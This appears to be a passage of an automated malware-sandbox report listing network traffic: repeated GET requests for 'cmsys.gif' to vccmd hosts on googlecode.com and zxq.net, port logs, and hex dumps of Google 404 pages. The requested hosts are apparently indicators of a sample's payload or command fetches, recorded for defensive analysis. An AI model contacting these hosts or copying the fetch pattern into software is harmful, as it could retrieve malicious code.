                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 